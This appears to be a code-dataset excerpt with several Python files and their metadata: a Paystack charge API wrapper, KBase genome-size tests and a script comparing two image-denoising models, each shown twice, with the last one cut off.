from spaceone.inventory.manager.ebs_manager import EBSConnectorManager
from spaceone.inventory.manager.s3_manager import S3ConnectorManager
from spaceone.inventory.manager.dynamodb_manager import DynamoDBConnectorManager
from spaceone.inventory.manager.vpc_manager import VPCConnectorManager
from spaceone.inventory.manager.ec2_manager import EC2ConnectorManager
from spaceone.inventory.manager.iam_manager import IAMConnectorManager
from spaceone.inventory.manager.acm_manager import ACMConnectorManager
from spaceone.inventory.manager.kinesis_data_stream_manager import KinesisDataStreamConnectorManager
from spaceone.inventory.manager.msk_manager import MSKConnectorManager
from spaceone.inventory.manager.kinesis_firehose_manager import KinesisFirehoseConnectorManager
# from spaceone.inventory.manager.workspace_manager import WorkspaceCollectorManager
|
en
| 0.393256
|
# from spaceone.inventory.manager.workspace_manager import WorkspaceCollectorManager
| 1.026564
| 1
|
paystacklib/api/charge.py
|
abimbola/paystack-lib-python
| 0
|
6627634
|
import paystacklib
from paystacklib.base.baseapi import BaseApi
from paystacklib.util.utils import clean_params
class Charge(BaseApi):
    """Paystack Charge API wrapper (POST /charge plus its follow-up endpoints)."""
    object_type = '/charge'
    def __init__(
        self, secret_key=None,
        # Default evaluated once at class-creation time, using object_type from
        # the enclosing class body; later changes to paystacklib.api_base do not
        # affect this default (methods below rebuild the uri explicitly).
        uri=paystacklib.api_base + object_type, method=None,
        headers=None, params=None):
        BaseApi.__init__(self, secret_key, uri, method, headers, params)
    @classmethod
    def charge(
        cls, amount, email,
        bank_code=None, bank_account_number=None,
        authorization_code=None, pin=None, metadata=None, reference=None,
        ussd_type=None, mobile_money=None, device_id=None):
        """Initiate a charge; optional bank/USSD details are nested into sub-objects."""
        bank_object = None
        ussd_object = None
        # Bank charge requires both code and account number.
        if bank_code and bank_account_number:
            bank_object = {}
            bank_object['code'] = str(bank_code)
            bank_object['account_number'] = str(bank_account_number)
        if ussd_type:
            ussd_object = {}
            ussd_object['type'] = ussd_type
        params = {'amount': amount, 'email': email, 'bank': bank_object,
            'authorization_code': authorization_code, 'pin': pin,
            'metadata': metadata, 'reference': reference, 'ussd': ussd_object,
            'mobile_money': mobile_money, 'device_id': device_id}
        # clean_params presumably drops None-valued entries -- TODO confirm.
        params = clean_params(params)
        uri = paystacklib.api_base + cls.object_type
        return cls(uri=uri, method='post', params=params).execute()
    @classmethod
    def submit_pin(cls, pin, reference):
        """Continue a pending charge by submitting the card PIN."""
        # NOTE(review): locals() also contains 'cls'; assumes clean_params
        # strips non-payload entries -- verify against util.utils.clean_params.
        params = clean_params(locals())
        uri = paystacklib.api_base + cls.object_type + '/submit_pin'
        return cls(uri=uri, method='post', params=params).execute()
    @classmethod
    def submit_otp(cls, otp, reference):
        """Continue a pending charge by submitting a one-time password."""
        params = clean_params(locals())
        uri = paystacklib.api_base + cls.object_type + '/submit_otp'
        return cls(uri=uri, method='post', params=params).execute()
    @classmethod
    def submit_phone(cls, phone, reference):
        """Continue a pending charge by submitting the customer's phone number."""
        params = clean_params(locals())
        uri = paystacklib.api_base + cls.object_type + '/submit_phone'
        return cls(uri=uri, method='post', params=params).execute()
    @classmethod
    def submit_birthday(cls, birthday, reference):
        """Continue a pending charge by submitting the customer's birthday."""
        params = clean_params(locals())
        uri = paystacklib.api_base + cls.object_type + '/submit_birthday'
        return cls(uri=uri, method='post', params=params).execute()
    @classmethod
    def check_pending_charge(cls, reference):
        """GET the current status of a pending charge by its reference."""
        uri = paystacklib.api_base + \
            '{0}/{1}'.format(cls.object_type, str(reference))
        return cls(uri=uri, method='get').execute()
|
import paystacklib
from paystacklib.base.baseapi import BaseApi
from paystacklib.util.utils import clean_params
class Charge(BaseApi):
object_type = '/charge'
def __init__(
self, secret_key=None,
uri=paystacklib.api_base + object_type, method=None,
headers=None, params=None):
BaseApi.__init__(self, secret_key, uri, method, headers, params)
@classmethod
def charge(
cls, amount, email,
bank_code=None, bank_account_number=None,
authorization_code=None, pin=None, metadata=None, reference=None,
ussd_type=None, mobile_money=None, device_id=None):
bank_object = None
ussd_object = None
if bank_code and bank_account_number:
bank_object = {}
bank_object['code'] = str(bank_code)
bank_object['account_number'] = str(bank_account_number)
if ussd_type:
ussd_object = {}
ussd_object['type'] = ussd_type
params = {'amount': amount, 'email': email, 'bank': bank_object,
'authorization_code': authorization_code, 'pin': pin,
'metadata': metadata, 'reference': reference, 'ussd': ussd_object,
'mobile_money': mobile_money, 'device_id': device_id}
params = clean_params(params)
uri = paystacklib.api_base + cls.object_type
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_pin(cls, pin, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_pin'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_otp(cls, otp, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_otp'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_phone(cls, phone, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_phone'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_birthday(cls, birthday, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_birthday'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def check_pending_charge(cls, reference):
uri = paystacklib.api_base + \
'{0}/{1}'.format(cls.object_type, str(reference))
return cls(uri=uri, method='get').execute()
|
none
| 1
| 2.219899
| 2
|
|
test/utility/genome_size_tests.py
|
samseaver/GenomeFileUtil
| 0
|
6627635
|
<filename>test/utility/genome_size_tests.py
import os
import shutil
import time
import unittest
import mock
from configparser import ConfigParser
from installed_clients.DataFileUtilClient import DataFileUtil
from GenomeFileUtil.GenomeFileUtilImpl import GenomeFileUtil
from GenomeFileUtil.GenomeFileUtilServer import MethodContext
from GenomeFileUtil.core.GenomeInterface import GenomeInterface
from installed_clients.WorkspaceClient import Workspace as workspaceService
class GenomeFileUtilTest(unittest.TestCase):
    """Integration tests for DNA-sequence retention vs. genome size limits.

    Each test converts the same E. coli GenBank file to a Genome object and
    checks which feature categories keep their ``dna_sequence`` field while
    ``GenomeInterface.MAX_GENOME_SIZE`` is patched to different thresholds.
    Requires a live KBase environment (KB_AUTH_TOKEN, KB_DEPLOYMENT_CONFIG and
    SDK_CALLBACK_URL must be set) -- these are not unit tests.
    """
    @classmethod
    def setUpClass(cls):
        # One-time setup: build a service context and the workspace/service
        # clients from the deployment config.
        token = os.environ.get('KB_AUTH_TOKEN', None)
        # WARNING: don't call any logging methods on the context object,
        # it'll result in a NoneType error
        cls.ctx = MethodContext(None)
        cls.ctx.update({'token': token,
                        'provenance': [
                            {'service': 'GenomeFileUtil',
                             'method': 'please_never_use_it_in_production',
                             'method_params': []
                             }],
                        'authenticated': 1})
        config_file = os.environ.get('KB_DEPLOYMENT_CONFIG', None)
        cls.cfg = {}
        config = ConfigParser()
        config.read(config_file)
        for nameval in config.items('GenomeFileUtil'):
            cls.cfg[nameval[0]] = nameval[1]
        cls.wsURL = cls.cfg['workspace-url']
        cls.wsClient = workspaceService(cls.wsURL, token=token)
        cls.serviceImpl = GenomeFileUtil(cls.cfg)
        cls.token = token
    @classmethod
    def tearDownClass(cls):
        # Remove the shared test workspace, if one was lazily created.
        if hasattr(cls, 'wsName'):
            cls.wsClient.delete_workspace({'workspace': cls.wsName})
            print('Test workspace was deleted')
    def getWsClient(self):
        return self.__class__.wsClient
    def getWsName(self):
        # Lazily create (and cache on the class) a uniquely named workspace.
        if hasattr(self.__class__, 'wsName'):
            return self.__class__.wsName
        suffix = int(time.time() * 1000)
        wsName = "test_GenomeFileUtil_" + str(suffix)
        self.getWsClient().create_workspace({'workspace': wsName})
        self.__class__.wsName = wsName
        return wsName
    def getImpl(self):
        return self.__class__.serviceImpl
    def getContext(self):
        return self.__class__.ctx
    def test_full_sequence(self):
        """Default size limit: every category keeps its DNA sequence."""
        # features should not have sequences in it. But both non_coding_features and CDSs should have sequences.
        print("test_full_sequence")
        gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
        ws_obj_name = 'full_sequence'
        result = self.getImpl().genbank_to_genome(
            self.getContext(),
            {
                'file': {
                    'path': gbk_path},
                'workspace_name': self.getWsName(),
                'genome_name': ws_obj_name,
                'generate_ids_if_needed': 1
            })[0]
        data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
                                token=self.__class__.token,
                                service_ver='dev')
        genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
        count_features_without_dna_sequence = 0
        for feature in genome['features']:
            if "dna_sequence" not in feature:
                count_features_without_dna_sequence += 1
        count_non_coding_features_without_sequence = 0
        for feature in genome['non_coding_features']:
            if "dna_sequence" not in feature:
                # Only short (<= 10 kbp) non-coding features are required to
                # carry a sequence; longer ones may legitimately omit it.
                if feature["dna_sequence_length"] <= 10000:
                    count_non_coding_features_without_sequence += 1
                    print("non_coding_feature_without_sequence: " + str(feature))
        count_cdss_without_sequence = 0
        for feature in genome['cdss']:
            if "dna_sequence" not in feature:
                count_cdss_without_sequence += 1
        self.assertTrue(count_features_without_dna_sequence == 0,"All features should have DNA sequences.")
        self.assertTrue(count_non_coding_features_without_sequence == 0,
                        "All non_coding_features should have DNA sequences.")
        self.assertTrue(count_cdss_without_sequence == 0,"All CDSs should have DNA sequences.")
    @mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 14000000)
    def test_partial_sequence(self):
        """Mid size limit (14 Mb): 'features' drop sequences; non-coding and CDSs keep them."""
        # features should not have sequences in it. But both non_coding_features and CDSs should have sequences.
        print("test_partial_sequence")
        gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
        ws_obj_name = 'partial_sequence'
        result = self.getImpl().genbank_to_genome(
            self.getContext(),
            {
                'file': {
                    'path': gbk_path},
                'workspace_name': self.getWsName(),
                'genome_name': ws_obj_name,
                'generate_ids_if_needed': 1
            })[0]
        data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
                                token=self.__class__.token,
                                service_ver='dev')
        genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
        count_features_with_dna_sequence = 0
        for feature in genome['features']:
            if "dna_sequence" in feature:
                count_features_with_dna_sequence += 1
        count_non_coding_features_without_sequence = 0
        for feature in genome['non_coding_features']:
            if "dna_sequence" not in feature:
                if feature["dna_sequence_length"] <= 10000:
                    count_non_coding_features_without_sequence += 1
                    print("non_coding_feature_without_sequence: " + str(feature))
        count_cdss_without_sequence = 0
        for feature in genome['cdss']:
            if "dna_sequence" not in feature:
                count_cdss_without_sequence += 1
        self.assertTrue(count_features_with_dna_sequence == 0,"All features should not have DNA sequences.")
        self.assertTrue(count_non_coding_features_without_sequence == 0,
                        "All non_coding_features should have DNA sequences.")
        self.assertTrue(count_cdss_without_sequence == 0,"All CDSs should have DNA sequences.")
    @mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 9000000)
    def test_no_sequence_kept(self):
        """Small size limit (9 Mb): no category keeps DNA sequences."""
        # features, cds, and non_coding_features should not have sequences in it.
        print("test_no_sequence_kept")
        gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
        ws_obj_name = 'no_sequence'
        result = self.getImpl().genbank_to_genome(
            self.getContext(),
            {
                'file': {
                    'path': gbk_path},
                'workspace_name': self.getWsName(),
                'genome_name': ws_obj_name,
                'generate_ids_if_needed': 1
            })[0]
        data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
                                token=self.__class__.token,
                                service_ver='dev')
        genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
        count_features_with_dna_sequence = 0
        for feature in genome['features']:
            if "dna_sequence" in feature:
                count_features_with_dna_sequence += 1
        count_non_coding_features_with_sequence = 0
        for feature in genome['non_coding_features']:
            if "dna_sequence" in feature:
                count_non_coding_features_with_sequence += 1
        count_cdss_with_sequence = 0
        for feature in genome['cdss']:
            if "dna_sequence" in feature:
                count_cdss_with_sequence += 1
        self.assertTrue(count_features_with_dna_sequence == 0,"All features should not have DNA sequences.")
        self.assertTrue(count_non_coding_features_with_sequence == 0,
                        "All non_coding_features should not have DNA sequences.")
        self.assertTrue(count_cdss_with_sequence == 0,"All CDSs should not have DNA sequences.")
    @mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 1)
    def test_max_genome_size(self):
        """Absurdly small limit: validate_genome must reject with a size error."""
        with self.assertRaisesRegex(ValueError, "This genome size of "):
            GenomeInterface.validate_genome({"taxon_ref": "", "domain": ""})
|
<filename>test/utility/genome_size_tests.py
import os
import shutil
import time
import unittest
import mock
from configparser import ConfigParser
from installed_clients.DataFileUtilClient import DataFileUtil
from GenomeFileUtil.GenomeFileUtilImpl import GenomeFileUtil
from GenomeFileUtil.GenomeFileUtilServer import MethodContext
from GenomeFileUtil.core.GenomeInterface import GenomeInterface
from installed_clients.WorkspaceClient import Workspace as workspaceService
class GenomeFileUtilTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
token = os.environ.get('KB_AUTH_TOKEN', None)
# WARNING: don't call any logging methods on the context object,
# it'll result in a NoneType error
cls.ctx = MethodContext(None)
cls.ctx.update({'token': token,
'provenance': [
{'service': 'GenomeFileUtil',
'method': 'please_never_use_it_in_production',
'method_params': []
}],
'authenticated': 1})
config_file = os.environ.get('KB_DEPLOYMENT_CONFIG', None)
cls.cfg = {}
config = ConfigParser()
config.read(config_file)
for nameval in config.items('GenomeFileUtil'):
cls.cfg[nameval[0]] = nameval[1]
cls.wsURL = cls.cfg['workspace-url']
cls.wsClient = workspaceService(cls.wsURL, token=token)
cls.serviceImpl = GenomeFileUtil(cls.cfg)
cls.token = token
@classmethod
def tearDownClass(cls):
if hasattr(cls, 'wsName'):
cls.wsClient.delete_workspace({'workspace': cls.wsName})
print('Test workspace was deleted')
def getWsClient(self):
return self.__class__.wsClient
def getWsName(self):
if hasattr(self.__class__, 'wsName'):
return self.__class__.wsName
suffix = int(time.time() * 1000)
wsName = "test_GenomeFileUtil_" + str(suffix)
self.getWsClient().create_workspace({'workspace': wsName})
self.__class__.wsName = wsName
return wsName
def getImpl(self):
return self.__class__.serviceImpl
def getContext(self):
return self.__class__.ctx
def test_full_sequence(self):
# features should not have sequences in it. But both non_coding_features and CDSs should have sequences.
print("test_full_sequence")
gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
ws_obj_name = 'full_sequence'
result = self.getImpl().genbank_to_genome(
self.getContext(),
{
'file': {
'path': gbk_path},
'workspace_name': self.getWsName(),
'genome_name': ws_obj_name,
'generate_ids_if_needed': 1
})[0]
data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
token=self.__class__.token,
service_ver='dev')
genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
count_features_without_dna_sequence = 0
for feature in genome['features']:
if "dna_sequence" not in feature:
count_features_without_dna_sequence += 1
count_non_coding_features_without_sequence = 0
for feature in genome['non_coding_features']:
if "dna_sequence" not in feature:
if feature["dna_sequence_length"] <= 10000:
count_non_coding_features_without_sequence += 1
print("non_coding_feature_without_sequence: " + str(feature))
count_cdss_without_sequence = 0
for feature in genome['cdss']:
if "dna_sequence" not in feature:
count_cdss_without_sequence += 1
self.assertTrue(count_features_without_dna_sequence == 0,"All features should have DNA sequences.")
self.assertTrue(count_non_coding_features_without_sequence == 0,
"All non_coding_features should have DNA sequences.")
self.assertTrue(count_cdss_without_sequence == 0,"All CDSs should have DNA sequences.")
@mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 14000000)
def test_partial_sequence(self):
# features should not have sequences in it. But both non_coding_features and CDSs should have sequences.
print("test_partial_sequence")
gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
ws_obj_name = 'partial_sequence'
result = self.getImpl().genbank_to_genome(
self.getContext(),
{
'file': {
'path': gbk_path},
'workspace_name': self.getWsName(),
'genome_name': ws_obj_name,
'generate_ids_if_needed': 1
})[0]
data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
token=self.__class__.token,
service_ver='dev')
genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
count_features_with_dna_sequence = 0
for feature in genome['features']:
if "dna_sequence" in feature:
count_features_with_dna_sequence += 1
count_non_coding_features_without_sequence = 0
for feature in genome['non_coding_features']:
if "dna_sequence" not in feature:
if feature["dna_sequence_length"] <= 10000:
count_non_coding_features_without_sequence += 1
print("non_coding_feature_without_sequence: " + str(feature))
count_cdss_without_sequence = 0
for feature in genome['cdss']:
if "dna_sequence" not in feature:
count_cdss_without_sequence += 1
self.assertTrue(count_features_with_dna_sequence == 0,"All features should not have DNA sequences.")
self.assertTrue(count_non_coding_features_without_sequence == 0,
"All non_coding_features should have DNA sequences.")
self.assertTrue(count_cdss_without_sequence == 0,"All CDSs should have DNA sequences.")
@mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 9000000)
def test_no_sequence_kept(self):
# features, cds, and non_coding_features should not have sequences in it.
print("test_no_sequence_kept")
gbk_path = "data/e_coli/GCF_000005845.2_ASM584v2_genomic.gbff"
ws_obj_name = 'no_sequence'
result = self.getImpl().genbank_to_genome(
self.getContext(),
{
'file': {
'path': gbk_path},
'workspace_name': self.getWsName(),
'genome_name': ws_obj_name,
'generate_ids_if_needed': 1
})[0]
data_file_cli = DataFileUtil(os.environ['SDK_CALLBACK_URL'],
token=self.__class__.token,
service_ver='dev')
genome = data_file_cli.get_objects({'object_refs': [result['genome_ref']]})['data'][0]['data']
count_features_with_dna_sequence = 0
for feature in genome['features']:
if "dna_sequence" in feature:
count_features_with_dna_sequence += 1
count_non_coding_features_with_sequence = 0
for feature in genome['non_coding_features']:
if "dna_sequence" in feature:
count_non_coding_features_with_sequence += 1
count_cdss_with_sequence = 0
for feature in genome['cdss']:
if "dna_sequence" in feature:
count_cdss_with_sequence += 1
self.assertTrue(count_features_with_dna_sequence == 0,"All features should not have DNA sequences.")
self.assertTrue(count_non_coding_features_with_sequence == 0,
"All non_coding_features should not have DNA sequences.")
self.assertTrue(count_cdss_with_sequence == 0,"All CDSs should not have DNA sequences.")
@mock.patch("GenomeFileUtil.core.GenomeInterface.MAX_GENOME_SIZE", 1)
def test_max_genome_size(self):
with self.assertRaisesRegex(ValueError, "This genome size of "):
GenomeInterface.validate_genome({"taxon_ref": "", "domain": ""})
|
en
| 0.970041
|
# WARNING: don't call any logging methods on the context object, # it'll result in a NoneType error # features should not have sequences in it. But both non_coding_features and CDSs should have sequences. # features should not have sequences in it. But both non_coding_features and CDSs should have sequences. # features, cds, and non_coding_features should not have sequences in it.
| 2.099079
| 2
|
scripts/compare_models.py
|
milebril/Temporal-SBMC-extension
| 0
|
6627636
|
<reponame>milebril/Temporal-SBMC-extension
import numpy as np
import torch as th
import cv2
import argparse
import tempfile
from torch.utils.data import DataLoader
import os
import pyexr
import cv2
import skimage.io as skio
from ttools.modules.image_operators import crop_like
import matplotlib.pyplot as plt
from collections import defaultdict
from sbmc import losses
from sbmc import modules
import ttools
import sbmc
# Module logger; silence matplotlib's very chatty font-manager logger.
LOG = ttools.get_logger(__name__)
ttools.get_logger('matplotlib.font_manager').disabled = True
# Leftover notes on model kwargs: 'ksize': 21, 'gather': False, 'pixel': False
def main(args):
    """Compare two denoising models on the same frames and visualize results.

    Loads a RecurrentMultisteps model (``--model1``) and a Multisteps model
    (``--model2``), denoises ``args.amount`` frames from ``args.data``, logs
    per-frame RMSE against the ground truth, saves labelled comparison images
    to ``args.save_dir``, and shows matplotlib grids of the outputs and of
    their frame-to-frame differences.

    :param args: argparse.Namespace with model1, model2, save_dir, data,
        amount and spp attributes (see the CLI definition at module bottom).
    :raises ValueError: if ``args.data`` does not exist.
    """
    if not os.path.exists(args.data):
        raise ValueError("input {} does not exist".format(args.data))
    # Load the data
    data_params = dict(spp=args.spp)
    data = sbmc.FullImagesDataset(args.data, **data_params)
    dataloader = DataLoader(data, batch_size=1, shuffle=False, num_workers=0)
    # Load the two models (on CPU first; moved to the GPU below if available)
    temp = th.load(f"{args.model1}", map_location=th.device('cpu'))
    model_one = sbmc.RecurrentMultisteps(data.num_features, data.num_global_features)
    try:  # Depending on the way a model is saved, the statedict is referenced with different keys
        model_one.load_state_dict(temp['model'])
    except:  # NOTE(review): bare except also hides unrelated errors; `except KeyError` would be safer
        model_one.load_state_dict(temp['model_state_dict'])
    model_one.train(False)
    temp = th.load(f"{args.model2}", map_location=th.device('cpu'))
    model_two = sbmc.Multisteps(data.num_features, data.num_global_features)
    try:  # Depending on the way a model is saved, the statedict is referenced with different keys
        model_two.load_state_dict(temp['model'])
    except:  # NOTE(review): bare except also hides unrelated errors; `except KeyError` would be safer
        model_two.load_state_dict(temp['model_state_dict'])
    model_two.train(False)
    device = "cuda" if th.cuda.is_available() else "cpu"
    if (device == "cuda"):
        LOG.info("Using CUDA")
        model_one.cuda()
        model_two.cuda()
    rmse_checker = losses.RelativeMSE()
    rmse_checker.to(device)
    # start = np.random.randint(0, 80) * 5
    start = 0
    model_one_outputs = []
    model_two_outputs = []
    ground_thruths = []
    for batch_idx, batch in enumerate(dataloader):
        # Denoise only frames in [start, start + args.amount).
        if batch_idx < start:
            continue
        if batch_idx >= start + args.amount:
            break
        for k in batch.keys():
            if not batch[k].__class__ == th.Tensor:
                continue
            batch[k] = batch[k].to(device)  # Sets the tensors to the correct device type
        # Compute the radiances using the two models
        with th.no_grad():
            output1 = model_one(batch)["radiance"]
            output2 = model_two(batch)["radiance"]
            model_one_outputs.append(output1)
            model_two_outputs.append(output2)
        # Get the input image and ground truth for comparison
        tgt = crop_like(batch["target_image"], output1)
        ground_thruths.append(tgt)
        low_spp = crop_like(batch["low_spp"], output1)
        # Compare to ground truth
        with th.no_grad():
            rmse1 = rmse_checker(output1, tgt)
            rmse2 = rmse_checker(output2, tgt)
        LOG.info(f"Model 1 denoised with rmse: {rmse1} || Model 2 denoised with rmse: {rmse2}")
        if rmse2 < rmse1:
            LOG.info("Model 2 outperformed model 1")
        else:
            LOG.info("Model 1 outperformed model 2")
        save_img(output1, output2, low_spp, tgt, args.save_dir, str(batch_idx))
    # Display denoising quality: one row per source (model 1, model 2, target)
    data_to_show = [model_one_outputs, model_two_outputs, ground_thruths]
    fig, axeslist = plt.subplots(ncols=len(model_one_outputs), nrows=len(data_to_show))
    plot_data = []
    for i, data in enumerate(data_to_show):
        for idx, img in enumerate(data):
            rmse = rmse_checker(img, ground_thruths[idx]).item()
            res = process_radiance(img)
            plot_data.append({'img': res, 'rmse': rmse})
    # Create image matrix; each tile is titled with its RMSE vs ground truth
    for ind, data in enumerate(plot_data):
        axeslist.ravel()[ind].imshow(data['img'])
        axeslist.ravel()[ind].set_title(str(round(data['rmse'], 5)))
        axeslist.ravel()[ind].set_axis_off()
    plt.tight_layout()  # optional
    plt.show()
    # Show frame-to-frame differences (temporal stability of each source)
    diff_array = []
    fig, axeslist = plt.subplots(ncols=len(model_one_outputs), nrows=3)
    rmse_data = defaultdict(list)
    data_to_show = [model_one_outputs, model_two_outputs, ground_thruths]
    for i, data in enumerate(data_to_show):
        for idx, img in enumerate(data):
            if idx > 0:
                diff = (img - data[idx-1]).abs()
                rmse = rmse_checker(img, data[idx-1]).item()
                rmse_data[str(i)].append(rmse)
            else:
                # First frame has no predecessor; show an all-zero diff.
                diff = th.zeros_like(tgt)
                rmse = 0
            res = process_radiance(diff)
            diff_array.append({'img': res, 'rmse': rmse})
    # Create image matrix
    for ind, data in enumerate(diff_array):
        axeslist.ravel()[ind].imshow(data['img'])
        axeslist.ravel()[ind].set_title(str(round(data['rmse'], 5)))
        axeslist.ravel()[ind].set_axis_off()
    plt.tight_layout()  # optional
    plt.show()
    # save_compare_frame(output1, output2, tgt)
    # make_compare_video(args.save_dir)
def process_radiance(data):
    """Tone-map a radiance tensor into a displayable HWC numpy image.

    Applies a Reinhard-style operator (x / (1 + x)) followed by gamma
    correction (exponent 1/2.2), clamps to [0, 1], and converts the first
    batch element from CHW torch layout to a contiguous HWC numpy array.
    """
    clamped = th.clamp(data, 0)
    tone_mapped = clamped / (1 + clamped)
    gamma_corrected = th.pow(tone_mapped, 1.0 / 2.2)
    displayable = th.clamp(gamma_corrected, 0, 1)
    image = displayable[0, ...].detach().cpu().numpy().transpose([1, 2, 0])
    return np.ascontiguousarray(image)
# Accumulated comparison frames (BGR uint8 arrays) consumed by make_compare_video().
frames = []


def save_compare_frame(radiance1, radiance2, tgt):
    """Append one comparison frame to the module-level ``frames`` list.

    Layout is a 2x2 grid: model 1 output | its abs diff with target on the
    top row, model 2 output | its abs diff with target on the bottom row.
    """
    # Difference between models and ground truth
    diff_model1 = (radiance1 - tgt).abs()
    diff_model2 = (radiance2 - tgt).abs()
    first_row = th.cat([radiance1, diff_model1], -1)
    second_row = th.cat([radiance2, diff_model2], -1)
    data = th.cat([first_row, second_row], -2)
    # Tone-map (Reinhard + gamma 1/2.2) into displayable [0, 1] range.
    data = th.clamp(data, 0)
    data /= 1 + data
    data = th.pow(data, 1.0/2.2)
    data = th.clamp(data, 0, 1)
    data = data[0, ...].cpu().detach().numpy().transpose([1, 2, 0])
    # Clip to 0-255 to remove HDR and pure radiance estimates + change to BGR color spectrum for opencv
    frames.append(cv2.cvtColor((np.clip(data, 0, 1)*255).astype(np.uint8), cv2.COLOR_RGB2BGR))
def make_compare_video(location):
    """Write the accumulated ``frames`` to <location>/compare_video.mp4 at 5 fps.

    Assumes save_compare_frame() has been called at least once (frames[0]
    is read unconditionally).
    """
    height, width, layers = frames[0].shape
    # Write to video
    out = cv2.VideoWriter(f'{location}/compare_video.mp4', cv2.VideoWriter_fourcc(*'mp4v'), 5, (width, height))
    # Play the sequence 10 times, reversing direction each pass (ping-pong loop).
    for _ in range(10):
        for i in range(len(frames)):
            out.write(frames[i])
        frames.reverse()
    out.release()
def save_img(radiance1, radiance2, low_radiance, tgt, checkpoint_dir, name):
    """Save a labelled comparison grid of both model outputs as EXR and PNG.

    Grid rows (top to bottom): low-spp input, model 1 output (+ abs diff
    with target), model 2 output (+ abs diff with target), target. Writes
    <checkpoint_dir>/<name>.exr (HDR) and <checkpoint_dir>/<name>.png.

    :param radiance1: model 1 radiance tensor, assumed (1, C, H, W) — TODO confirm.
    :param radiance2: model 2 radiance tensor, same shape as radiance1.
    :param low_radiance: low sample-count input radiance.
    :param tgt: ground-truth radiance.
    :param checkpoint_dir: output directory (created if missing).
    :param name: basename for the output files.
    """
    tmp_empty = th.zeros_like(radiance1)  # Empty filler tensor

    # Difference between models and ground truth
    diff_model1 = (radiance1 - tgt).abs()
    diff_model2 = (radiance2 - tgt).abs()

    # Create output data in the form:
    # low spp input --
    # output model1 -- Diff with tgt
    # output model2 -- Diff with tgt
    # tgt --
    first_row = th.cat([tmp_empty, low_radiance, tmp_empty], -1)
    second_row = th.cat([tmp_empty, radiance1, diff_model1], -1)
    third_row = th.cat([tmp_empty, radiance2, diff_model2], -1)
    fourth_row = th.cat([tmp_empty, tgt, tmp_empty], -1)

    # Concatenate the rows in a vertical stack and tone-map for display.
    data = th.cat([first_row, second_row, third_row, fourth_row], -2)
    data = th.clamp(data, 0)
    data /= 1 + data
    data = th.pow(data, 1.0/2.2)
    data = th.clamp(data, 0, 1)
    data = data[0, ...].cpu().detach().numpy().transpose([1, 2, 0])
    data = np.ascontiguousarray(data)

    # Add one text label per grid row.
    jump = radiance1.size()[2]
    font = cv2.FONT_HERSHEY_SIMPLEX
    cv2.putText(data, '4spp', (10, jump * 0 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
    cv2.putText(data, 'Model 1', (10, jump * 1 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
    cv2.putText(data, 'Model 2', (10, jump * 2 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
    cv2.putText(data, 'Target', (10, jump * 3 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)

    os.makedirs(checkpoint_dir, exist_ok=True)
    # BUG FIX: the EXR output was previously named '<name>.png', so the
    # '.exr' -> '.png' substitution below was a no-op and the subsequent PNG
    # write clobbered the EXR data. Name the HDR file '<name>.exr' instead.
    outputfile = os.path.join(checkpoint_dir, f'{name}.exr')
    pyexr.write(outputfile, data)
    png = outputfile.replace(".exr", ".png")
    skio.imsave(png, (np.clip(data, 0, 1)*255).astype(np.uint8))
def load_model(model, load_path):
    """Restore a model's weights from a checkpoint file.

    :param model: module whose state dict will be overwritten in place.
    :param load_path: path to a checkpoint holding 'model_state_dict' and
        'epoch' entries.
    :return: (model, epoch) tuple.
    """
    snapshot = th.load(load_path)
    model.load_state_dict(snapshot['model_state_dict'])
    return model, snapshot['epoch']
if __name__ == "__main__":
    # CLI entry point: parse arguments, enable ttools logging, run comparison.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--model1', required=True, help="path to the first model")
    parser.add_argument(
        '--model2', required=True, help="path to the second model")
    parser.add_argument(
        '--save_dir', required=True, help="path to the dir where everything has to be saved")
    parser.add_argument(
        '--data', required=True, help="path to the training data.")
    parser.add_argument(
        '--amount', required=False, type=int, default=1, help="Amount of frames to denoise and compare")
    parser.add_argument('--spp', type=int,
                        help="number of samples to use as input.")
    args = parser.parse_args()
    ttools.set_logger(True)
    main(args)
|
import numpy as np
import torch as th
import cv2
import argparse
import tempfile
from torch.utils.data import DataLoader
import os
import pyexr
import cv2
import skimage.io as skio
from ttools.modules.image_operators import crop_like
import matplotlib.pyplot as plt
from collections import defaultdict
from sbmc import losses
from sbmc import modules
import ttools
import sbmc
LOG = ttools.get_logger(__name__)
